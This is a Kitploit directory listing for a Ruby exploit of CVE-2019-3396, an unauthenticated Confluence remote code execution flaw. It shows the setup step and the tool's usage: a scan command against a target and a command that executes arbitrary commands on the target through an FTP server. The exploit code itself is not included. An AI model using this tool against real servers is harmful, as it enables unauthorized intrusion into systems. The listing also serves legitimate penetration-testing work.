Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2019-3396 — Ruby exploit for CVE-2019-3396 enabling unauthenticated Confluence remote code execution, including target scanning and command execution via an FTP server. | Kitploit
Tools/GitHubGitHub/0xninjacyclone/cve-2019-3396
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHub0xninjacyclone/cve-2019-3396

cve-2019-3396

Ruby exploit for CVE-2019-3396 enabling unauthenticated Confluence remote code execution, including target scanning and command execution via an FTP server.

View Repository
3114 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2019-3396

Unauthenticated Confluence RCE (cve-2019-3396)

setup exploit libraries

root@kitploit:~
bundle install

run

root@kitploit:~
┌──(user㉿hostname)-[~/path/to/cve-2019-3396]
└─$ ruby cve-2019-3396.rb 

        exploit   ->    CVE-2019-3396
        Author    ->    Abdallah Mohamed Elsharif
        Greetz to Ghost5egy and Hamza Abdulrahman and Omar and Alaa

        Usage: 
                ruby cve-2019-3396.rb [options] Or --help



scan

root@kitploit:~
ruby cve-2019-3396.rb -t TARGET --scan

exploit

root@kitploit:~
ruby cve-2019-3396.rb -t TARGET --ftp-serv FTPHOST -c COMMAND
Download Tool